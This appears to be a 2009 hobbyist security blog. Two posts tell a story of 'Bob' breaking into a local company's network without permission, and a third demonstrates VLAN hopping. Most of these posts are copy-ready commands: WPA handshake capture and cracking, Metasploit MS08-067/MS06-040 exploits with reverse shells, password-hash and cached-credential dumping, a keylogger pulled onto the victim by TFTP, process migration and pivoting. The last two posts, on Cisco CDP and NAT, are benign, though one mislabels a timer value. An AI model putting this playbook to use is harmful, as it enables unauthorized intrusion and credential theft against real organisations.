Saturday, October 31, 2009

Bobs Double Penetration Adventure - Part 2

So Bob decides to revisit his new found playground at Walliford Fries and get to grips with his new tools. He connects up to the wifi with the password he's already cracked and this time rather than using the Autopwn feature he decides to try something else. Bob's idea is to use the PC he exploited previously as a point to launch other attacks deeper into the network.

Bob launches his trusty MS08-067 exploit this time with a meterpreter/reverse_tcp payload

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
set RHOST 192.168.1.102

set ExitOnSession False

exploit -j -z




Excellent, Bob gets his session. He connects to the session and checks the network settings on his compromised host.

sessions -i 1
execute -H -f cmd.exe -i

ipconfig




While he is on the remote host Bob checks a few things, ideally he could do with knowing about the network servers. At this point he just wants the basics, name & IP.

Net view



And he could do with the IP addresses too. He'll want these for his scans.

ping -n 1 server01
ping -n 1 server02






That'll do for now. Bob comes out of the shell, backgrounds his meterpreter session and creates a route pointing to the internal LAN through his session.

exit
background

route add 10.0.1.0 255.255.255.0 1
route print



Now time to see if the magic works. Bob selects the auxiliary scanner and checks the OS versions of the two servers on the internal LAN by pivoting through his compromised host.

use auxiliary/scanner/smb/version
set RHOSTS 10.0.1.230

run
set RHOSTS 10.0.1.231
run



Hmmm, interesting. Windows 2003 with no service pack. Bob wonders if he can exploit that through the pivot?

use windows/smb/ms08_067_netapi
set RHOST 10.0.1.231

set PAYLOAD windows/meterpreter/reverse_tcp
exploit





Bugger! No such luck. Hang on though, Bob remembers something he read once. He can use Mubix's handy dandy deploymsf script to install Metasploit on his compromised host. Perfect!

He grabs files he needs from the web, putting them into his plugin directory.

cd /pentest/exploits/framework3/plugins/
wget http://metasploit.com/releases/framework-3.3-dev.exe
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb

And then it's just a case of connecting back to his session on the pwned box, running the script and pointing it to the metasploit executable.

sessions -i 1
run deploymsf.rb -f ../../../pentest/exploits/framework3/plugins/framework-3.3-dev.exe




Holly crap Batman! look at that. Bob has installed Metasploit on the host he compromised, thanks to a weak password on the wireless LAN and a missing patch or two.



Now the output isnt always pretty but it gets the job done.



So whats next? Well there is that server with no service pack to take care of. For that Bob will try his old faithful ms06_040 exploit.

use windows/smb/ms06_040_netapi
set RHOST 10.0.1.231
set PAYLOAD windows/meterpreter/reverse_tcp

exploit



Perfect, another box to play with. Now Bob wants to dig in deep so he can play on this network for as long as possible so he's going to need to start pulling together some serious information. He could get this all manually but of course that's pretty dumb, especially when he can use Dark Operators excellent WinEnum script. This will go out and grab nearly everything he wants so he acn understand the network better and stick it all in one big text file so Bob has some bedtime reading. As Bobs already sitting in a meterpreter session he simply runs the WinEnum script.

run winenum




Sorted. Again it's getting late so Bob decides to call it a day. Before he does though he needs to leave himself a few backdoors.......which will of course be in the next post.

Saturday, October 24, 2009

Bobs Double Penetration Adventure - Part 1

A couple of days ago a mate at work asked about the security issues surrounding computers that are connected to the company network and also to the Internet via a wifi connection. This question was perfect fodder for a Bob story I thought. So the story goes.......


Bobs a curious fella and he really likes to explore. Lately he's been learning about hacking, nothing evil, just really having a look in places that he shouldn't be looking, you know, a curiosity thing. As Bob sits at home it occurs to him that the perfect target for his hacking adventures is Walliford Fries, a chip maker based in his small town. He has nothing against Wallifords, he doesn't mean them any harm, he's just pissed off at the way the Wallifords are unloading their trucks at 5 in the morning and waking him up. So his intention is to see if he can get onto the Walliford network with some if these free hacking tools he's downloaded from the web and use Wallifords as his new playground.

Bob's not a traditional hacker, he doesn't go to the targets website and spend hours going through the detail, looking for business relationships, email address, job postings etc.. He hasn't even started looking at IP ranges and ports. All Bob has done is fire up his laptop sporting a brand new install of BackTrack4 and looked at whats about on the Wifi.



That's interesting, here he has a WPA network called WF-IT that is no doubt Walliford Fries related, After all, his house is within spitting distance of the Walliford offices. Shame its not WEP though, that could be cracked in minutes. Now Bob knows that his best bet is to customise his word list for this particular target, so he decides to scrape Wallifords website and add all those words to his wordlist.

wget -r http://www.wallifordfries.com
wyd.pl -n -o /root/temp/WF-wordlist.txt /root/www.wallifordfries.com/

cat /root/temp/WF-wordlist.txt | sort | uniq > wordlist2.txt

cat wordlist2.txt | pw-inspector -m 1 -M 20 >WF-customlist.txt


After creating his custom wordlist Bob decides to add it to an existing wordlist. As he'll need to create a hash of his wordlist to bruteforce the WPA key he just opts for his small but popular password list, if this fails he'll have to go for the bigger wordlist he likes to call "Mother", but first he'll opt for the easy option.

cat WF-customlist >>/root/temp/wordlist.txt

Bob now needs to get his wireless sniff on. He puts his wifi card into monitor mode and grabs the necessary BSSIDs of the access point and a client.

airmon-ng start wlan0 11

airodump-ng -c 11 mon0



With the BSSID of the client and the Access Point he starts his capture and saves it to a file.

airodump-ng -c 11 --bssid 00:18:F8:4B:43:86 -w /root/temp/Walliford mon0



With the capture going he sends a few de-auths packets so he can capture the 4 way handshake, this is critical for him to perform his WPA crack.

aireplay-ng -0 1 -a 00:18:F8:4B:43:86 -c 00:11:50:BB:D6:28 mon0



Great, Bob now has all he needs to begin his WPA crack. He quickly generates his hash file from the custom wordlist, hopefully all this effort will pay off.

To generate the hash he uses the genpmk tool from the cowpatty directory.

./genpmk -f /root/temp/wordlist.txt -d /root/temp/hash -s WF-IT

And to crack the key he uses cowpatty.

./cowpatty -r /root/temp/Walliford-01.cap -d /root/temp/hash -s WF-IT



Bingo! Bob got the WPA key in no time at all. He checks it by taking the card out of monitor mode and connecting to the AP.

airmon-ng stop mon0



Excellent, as soon as Bob finishes punching the air and doing his little dance he checks the wifi network for other hosts.

nmap 192.168.2.0/24 -sP



Got one, well two if you count the Linksys AP but lets focus on the one using the Belkin card for now. Wondering what ports it has open Bob puts Nmap to good use, again saving the results to a file.

nmap 192.168.2.102 -sV -oA ~/temp/wal-nmap



Bobs intention is to fire up Nessus and scan his target but first he knows a quick way to check for a vulnerability that he knows he has a working exploit for.

nmap 192.168.2.102 -PN -T4 -p139,445 -n --script=smb-check-vulns --script-args=unsafe=1



Perfect, Nmap has told Bob that he should be able to exploit the remote PC with the conficker exploit. He can't believe that Walliford still has unpatched PC's for this vulnerability. I guess the guys from pauldotcom are right. They have a firewall and they have AV so there safe right? Wrong!

Bob confirms his findings with Nessus and checks for any other vulnerabilities that he might have some fun with.



Well Nessus confirmed the vulnerability from his Nmap scan which is good but it doesn't find much else. Oh well, he saves his scan as an .nbe file so he can feed it into Metasploit.

After firing up Metasploit Bob decides to try out the db_autopwn feature to launch any exploits that it has against the ports it's found open.

db_create walliford
db_import_nessus_nbe /root/temp/walliford.nbe

db_hosts
db_autopwn -p -e -r -t




Oh and time for another crazy dance, Bob gets a session on the remote host and he can see that he's got system privileges which is always nice. He dumps out the local users hashes for some John the Ripper fun later and he checks out the route table. Superb, he can see that the remote host is also connected to the Walliford LAN.

sysinfo
getuid

hashdump




At this point Bob decides at this point to get a little interactive so he pulls up a command prompt on the compromised host.

execute -H -f cmd.exe -i

He TFTP's a couple of handy dandy files from his laptop and grabs the hashes of any domain accounts that have logged into this box. With a hostname such as PC-IT-1 he guesses these are going to be quite useful for his exploration adventures in his new playground.

tftp -i 192.168.2.101 get cachedump.exe
tftp -i 192.168.2.101 get klogger.exe

cachedump.exe




Now he decides to have a little look around on the server. He maps a drive to the IT folder and attempts to have a poke around.

net view \\server01
net use * \\server01\IT




Damn. The NTFS permissions wont allow him access. Then it dawns on him, the system account he is using doesn't have permissions on the server. Maybe not but with a hostname like PC-IT-1 the logged in user probably will have. He comes out of his session lists the processes and then migrates to a process which is running in the context of the user.

quit
ps
getuid

migrate 784

getuid




Perfect, he's migrated to the Explorer.exe process and now he's now running as James. Bob launches an interactive shell again and checks his mapped drives.

execute -H -f cmd.exe -i
net use

I:




Brilliant. Bobs got access to the IT folder. From here he can have a good poke around before he decides his next move. He's got some good old fashioned password cracking to do and times getting on so Bob decides to call t a day for now.

Sunday, October 18, 2009

Abusing VLANs With BackTrack

In this post I'm going to have a little fun with VLANs. As I've been studying for the CCNA cert I've been reading how great VLANs are, so in this post i'm going to have a little fun with some really cool tools from the Backtrack distro. My aim is to demonstrate why simlpy placing hosts in a seperate VLAN might sometimes not be enough if you really don't want anyone to have access to them. Let's get started.

Tools
BackTrack
Yersinia
vconfig
Wireshark
Nmap

I start off by connecting to the LAN and getting a network address

dhclient eth0



I can see that I'm attached to the network 10.0.1.0/24

Next I fire up wireshark and check the network for DTP (Dynamic Trunking Protocol) frames and CDP (Cisco Discovery Protocol) frames.



I can see that I have both CDP and DTP frames present.

Now I want to tell the switch that my port is a trunk port, for this I'll use Yersinia and tell it to look at DTP.

yersinia -I



After I see DTP frames appear in Yersinia I launch the attack to configure the port for trunking.



Now I need to know the VLAN number that other networks are on. Before launching Yersinia I could only see traffic from my own network (10.0.1.0/24), now I can start to see traffic from hosts on another network (192.168.2.2).



Looking at the 802.1Q information in the frame I can see that the other network is on VLAN 2.



With this information I'll create a new interface in the new network and configure vconfig to tag the frames for VLAN2.

vconfig add eth0 2
ifconfig eth0.2 up
ifconfig eth0.2 192.168.2.200/24
ifconfig



Now I check I can ping the host I saw with Wireshark and I have a quick look at it's ports with Nmap.

ping -c 2 192.168.2.2
nmap 192.168.2.2




Great, I have plenty here to play with, and on port 80 ...........




Okay obviously this was staged but hopefully it illustrates two things. VLANs can be abused and Yersinia rocks!!!!!!!!!

Saturday, October 3, 2009

Discovering Devices with CDP

I touched on CDP briefly in a previous post, but here I'll talk a little more about why CDP is so great and how it can be used to help map and manage your network.

CDP stands for Cisco Discovery Protocol and is basically where your switch or router broadcasts a packet out of every interface stating some information about itself. This information includes:

  • IP Address
  • Port number
  • Port type
  • Device name
  • Device hardware
  • IOS version
  • Port speed
  • Duplex settings
  • Vlan information

That's right, all this really useful information gets thrown out of every port every minute by default and most of us just ignore it. Well if your a Cisco device you don't. If your a Cisco device you'll take that information and keep it in memory and build up a neighbor database. And if your a geek like me you can use that information to help you map your network and have some CDP fun! Here's how.


Configuring CDP

Well there's not much to configure. It's on by default it just works.

Secure#show cdp
Global CDP information:
Sending CDP packets every 60 seconds
Sending a holdtime value of 180 seconds
Sending CDPv2 advertisements is enabled

I can see from the output above that CDP packets are sent every 60 seconds. If I wanted to send CDP packets every 30 seconds I could configure that using the following command:

Secure(config)#cdp timer 60

OK, lets see what information CDP gives us.

Secure#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
S1 Eth 0 151 S I WS-C2950-2Fas 0/17
S1 Eth 1 151 S I WS-C2950-2Fas 0/1


Here I can see that I have my routers port Ethernet 0 connected to port FastEthernet 0/17 on a 2950 switch and Ethernet 1 connected to port FastEthernet 0/1 on a 2950 also. I can also see that the Device ID is S1 which is the name of my switch. Wouldn't it be useful if I new the IP Address of the switch as well. Well here's how we find that out.

Secure#show cdp neighbors detail
-------------------------
Device ID: S1
Entry address(es):
IP address: 10.0.1.210
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: Ethernet0, Port ID (outgoing port): FastEthernet0/17
Holdtime : 158 sec

Version : Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(12c)EA1, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Sun 24-Nov-02 23:31 by antonino

advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000F
VTP Management Domain: ''
Duplex: full
Power drawn: 4294967.294 Watts

-------------------------

Device ID: S1 Entry address(es):
IP address: 10.0.1.210
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: Ethernet1, Port ID (outgoing port): FastEthernet0/1
Holdtime : 158 sec

Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(12c)EA1, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2002 by cisco Systems, Inc.
Compiled Sun 24-Nov-02 23:31 by antonino

advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000F VTP Management Domain: ''
Duplex: full
Power drawn: 4294967.294 Watts


So from here I can start to diagram my network by hopping from decice to device and adding in detailed information about connected devices that CDP knows about. I can see which ports are fastethernet and which are not, which are full duplex and so much more.

So by now were realising that this CDP information is great to an administrator but probably great to an attacker too so let's say we don't want CDP leaving my router on interface ethernet 1 for example. Here's how we do that.

Before I stop CDP on the router I check the switch and make sure it is working as expected.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
Secure Fas 0/17 129 R Cisco C831Eth 0
Secure Fas 0/1 129 R Cisco C831Eth 1

I can see that I have 2 CDP entries as expected. Now I go to my router and stop CDP on Ethernet 1.


Secure#conf t
Secure(config)#interface ethernet 1
Secure(config-if)#no cdp enable
Secure(config-if)#exit


I go back to my switch and see whats going on there.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
Secure Fas 0/17 179 R Cisco C831Eth 0
Secure Fas 0/1 119 R Cisco C831Eth 1

I can see the CDP entry is still there but the holddown timer for Eth1 is still expiring whilst Eth0 has refreshed after it recieved a packet at the 60 second period.

Finally after the 180 seconds has passed I can see the CDP entry for Eth1 drop out.

S1#show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
Secure Fas 0/17 159 R Cisco C831Eth 0

And thats about it for CDP.

NAT Overload

In this post i'll configure NAT Overload (PAT) on my Cisco router.

NAT is primarily used for the following purposes.

  • To efficiently utilise public IP addresses and slow the depletion of IP version 4 addresses.
  • To help mask the internal IP address ranges from external sources.
  • To aid in the merge of similiarly addressed networks.

NAT can either be used in a one to many configuration (PAT), or a one to one configuration (Static or Dynamic). Here I'll cover NAT Overload.


When used in a one to many configuration the router uses the port numbers to remember connections. For example:

Internal - External
192.168.1.1:4567 - 80.233.1.67:4567
192.168.1.2:3458 - 80.233.1.67:3458

The same external address is used however the external address uses the internal addresses source port number as its own source port number.


Configuration

To configure NAT Overload so all my internal hosts on the address subnet 192.168.2.0 (defined in the access list in step 3) use the address 192.168.2.200 (as defined in the NAT pool in step 2).


1. Name the interfaces.

Secure#conf t
Secure(config)#interface eth 0
Secure(config-if)#ip nat inside
Secure(config)#interface eth 1
Secure(config-if)#ip nat outside
Secure(config-if)#exit



2. Create the Pool of addresses to be used to NAT

Secure(config)#ip nat pool Secure-Pool 192.168.2.10 192.168.2.10 net 255.255.255.0



3. Create a standard ACL that identifies addresses that will be NAT'd

Secure(config)#ip access-list standard 10
Secure(config-std-nacl)#permit 192.168.2.0 0.0.0.255


4. Enable NAT
Secure(config)#ip nat inside source list 10 pool Secure-Pool overload

When I ping the external host all traffic is seen as coming from the address that I set up in the pool.



All works well but because of my lab setup I need to change the pool address to one that works on my other network which connects to the internet.

Secure(config)#no ip nat inside source list 10 pool Secure-Pool overload
Secure(config)#ip nat pool Secure-Pool 10.0.1.199 10.0.1.199 net 255.255.255.0
Secure(config)#ip nat inside source list 10 pool Secure-Pool overload

Now from my lab I can get access to the web and if I ping a host on my lab net I see the correct NAT address returned.





Troubleshooting and Debugging

A useful show command for looking at active translations is:

Secure#show ip nat translations
Pro Inside global Inside local Outside local Outside global
icmp 10.0.1.199:768 192.168.2.4:768 10.0.1.5:768 10.0.1.5:768
--- 10.0.1.199 192.168.2.4 --- ---



For looking at translations as they happen you can use:

Secure#terminal monitor
Secure#debug ip nat detailed
IP NAT detailed debugging is on
Secure#
*Sep 27 14:09:52.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56303]
*Sep 27 14:09:52.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56303]
*Sep 27 14:09:52.903: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56303]
*Sep 27 14:09:52.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [32653]
*Sep 27 14:09:52.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [32653]
Secure#
*Sep 27 14:09:53.903: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56304]
*Sep 27 14:09:53.903: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56304]
*Sep 27 14:09:53.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [61886]
*Sep 27 14:09:53.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [61886]
Secure#
*Sep 27 14:09:54.907: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56305]
*Sep 27 14:09:54.907: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56305]
*Sep 27 14:09:54.907: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [47007]
*Sep 27 14:09:54.907: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [47007]
Secure#
*Sep 27 14:09:55.907: NAT*: i: icmp (192.168.2.4, 768) -> (10.0.1.5, 768) [56306]
*Sep 27 14:09:55.907: NAT*: s=192.168.2.4->10.0.1.199, d=10.0.1.5 [56306]
*Sep 27 14:09:55.915: NAT*: o: icmp (10.0.1.5, 768) -> (10.0.1.199, 768) [28657]
*Sep 27 14:09:55.915: NAT*: s=10.0.1.5, d=10.0.1.199->192.168.2.4 [28657]
Secure#

In the output above we can see that were looking at ICMP traffic from 192.168.2.4 to 10.0.1.5 which is NAT'd to 10.0.1.199.


For NAT statistics:

Secure#sh ip nat statistics
Total active translations: 2 (0 static, 2 dynamic; 1 extended)
Outside interfaces:
Ethernet1
Inside interfaces:
Ethernet0
Hits: 4295 Misses: 212
CEF Translated packets: 3413, CEF Punted packets: 1847
Expired translations: 637
Dynamic mappings:
-- Inside Source
[Id: 7] access-list 2 pool Secure-Pool refcount 2
pool Secure-Pool: netmask 255.255.255.0
start 10.0.1.199 end 10.0.1.199
type generic, total addresses 1, allocated 1 (100%), misses 0
Queued Packets: 0
Secure#